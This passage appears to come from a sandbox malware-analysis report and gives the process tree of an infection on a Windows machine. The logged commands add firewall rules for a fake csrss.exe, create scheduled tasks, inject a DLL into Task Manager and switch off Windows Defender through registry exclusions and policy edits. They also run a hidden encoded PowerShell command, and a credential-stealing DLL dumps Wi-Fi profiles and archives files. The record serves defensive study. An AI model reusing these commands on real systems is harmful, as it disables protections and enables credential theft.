C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 15325⤵
- Program crash
PID:3128
-
-
-
C:\Users\Admin\Pictures\KR7axLmK85pHCtYC8Jy6HuM8.exe"C:\Users\Admin\Pictures\KR7axLmK85pHCtYC8Jy6HuM8.exe"4⤵
- Executes dropped EXE
PID:4864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Users\Admin\Pictures\KR7axLmK85pHCtYC8Jy6HuM8.exe"C:\Users\Admin\Pictures\KR7axLmK85pHCtYC8Jy6HuM8.exe"5⤵PID:5400
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:6112
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:6136
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:816
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5840
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4764
-
-
-
-
C:\Users\Admin\Pictures\FHZBtr50rRcfTdllNwk2pZND.exe"C:\Users\Admin\Pictures\FHZBtr50rRcfTdllNwk2pZND.exe"4⤵
- Executes dropped EXE
PID:4440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4648
-
-
C:\Users\Admin\Pictures\FHZBtr50rRcfTdllNwk2pZND.exe"C:\Users\Admin\Pictures\FHZBtr50rRcfTdllNwk2pZND.exe"5⤵PID:5496
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5292
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:5288
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:4364
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5884
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:3552
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 8325⤵
- Program crash
PID:708
-
-
-
C:\Users\Admin\Pictures\GMzYdBCcCSK6EIzmSzSqgTWZ.exe"C:\Users\Admin\Pictures\GMzYdBCcCSK6EIzmSzSqgTWZ.exe"4⤵
- Executes dropped EXE
PID:2492 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3472
-
-
C:\Users\Admin\Pictures\GMzYdBCcCSK6EIzmSzSqgTWZ.exe"C:\Users\Admin\Pictures\GMzYdBCcCSK6EIzmSzSqgTWZ.exe"5⤵PID:5672
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4484
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:1608
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:5900
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5680
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:1980
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵PID:3896
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:5468
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:2892
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵PID:1696
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:2792
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:5388
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵PID:2632
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:5696
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵PID:2548
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵PID:3188
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Launches sc.exe
PID:5652
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\nZXf9m6T3j0fmQmAo2ECjkpw.exe"C:\Users\Admin\Pictures\nZXf9m6T3j0fmQmAo2ECjkpw.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 6206⤵
- Program crash
PID:2372
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 6446⤵
- Program crash
PID:2372
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 8685⤵
- Program crash
PID:2020
-
-
-
C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe"C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:3800 -
C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exeC:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6f27e1d0,0x6f27e1dc,0x6f27e1e85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3076
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\G0jT3CGihLOYKL4sbc74s4ak.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\G0jT3CGihLOYKL4sbc74s4ak.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3780
-
-
C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe"C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3800 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240401133030" --session-guid=32799665-0bde-4673-b118-8a8ed9eaaf03 --server-tracking-blob=OWM3NmYzNWU3YmZlNzc0NGE2MGQwYjQwOGI4YmJkZmQ4MGIyNGZiNmViY2Q0ZTFjYmI3MWExOWM3NTljOWM3OTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N180NTYiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMCIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE5NzgyMDkuNDM5OSIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N180NTYiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6ImYzMjgzMmU4LWI5NWQtNDkyZC1iNzAwLTgwMjc4MDUzODY0NiJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=18040000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:2424 -
C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exeC:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x2a8,0x2ac,0x2b0,0x278,0x2b4,0x6e8be1d0,0x6e8be1dc,0x6e8be1e86⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5016
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"5⤵PID:940
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\assistant_installer.exe" --version5⤵PID:5572
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0xd10040,0xd1004c,0xd100586⤵PID:5968
-
-
-
-
C:\Users\Admin\Pictures\LxSSn55Rw88rJ6lmDBQ8L4ps.exe"C:\Users\Admin\Pictures\LxSSn55Rw88rJ6lmDBQ8L4ps.exe"4⤵
- Executes dropped EXE
PID:4748 -
C:\Users\Admin\AppData\Local\Temp\7zS27B7.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
PID:4348 -
C:\Users\Admin\AppData\Local\Temp\7zS533C.tmp\Install.exe.\Install.exe /ydfmdidw "385118" /S6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:4380 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵PID:5876
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵PID:5564
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵PID:924
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵PID:1056
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵PID:5968
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵PID:5576
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵PID:5828
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵PID:6008
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gyIzNkbkI" /SC once /ST 09:32:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
PID:6124
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gyIzNkbkI"7⤵PID:5740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gyIzNkbkI"7⤵PID:772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 13:32:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\aelnwhS.exe\" id /QHsite_idTsk 385118 /S" /V1 /F7⤵
- Creates scheduled task(s)
PID:4440
-
-
-
-
-
C:\Users\Admin\Pictures\q6fTDfvQIk0vQg4JK85pUzGa.exe"C:\Users\Admin\Pictures\q6fTDfvQIk0vQg4JK85pUzGa.exe"4⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2344
-
-
C:\Users\Admin\Pictures\Bp69MLnON446Ce82F0kC5faD.exe"C:\Users\Admin\Pictures\Bp69MLnON446Ce82F0kC5faD.exe"4⤵
- Executes dropped EXE
PID:2584 -
C:\Users\Admin\AppData\Local\Temp\7zS26AD.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
PID:3180 -
C:\Users\Admin\AppData\Local\Temp\7zS53F7.tmp\Install.exe.\Install.exe /ydfmdidw "385118" /S6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:4404 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵PID:5852
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵PID:5140
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵PID:5604
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵PID:1612
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵PID:5896
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵PID:5416
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵PID:5792
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵PID:4332
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnCBwhIZZ" /SC once /ST 10:00:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
PID:6060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnCBwhIZZ"7⤵PID:5744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnCBwhIZZ"7⤵PID:1568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 13:32:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\gLKZBXU.exe\" id /Qwsite_idRvr 385118 /S" /V1 /F7⤵
- Creates scheduled task(s)
PID:3980
-
-
-
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:1028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\045580317372_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3816 -ip 38161⤵PID:4504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4240 -ip 42401⤵PID:1468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3580 -ip 35801⤵PID:312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4240 -ip 42401⤵PID:4804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 976 -ip 9761⤵PID:5504
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:3944
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:620
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5440
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4440 -ip 44401⤵PID:1632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3084
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5992
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2816
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:5552
-
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\aelnwhS.exeC:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\aelnwhS.exe id /QHsite_idTsk 385118 /S1⤵PID:3172
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD 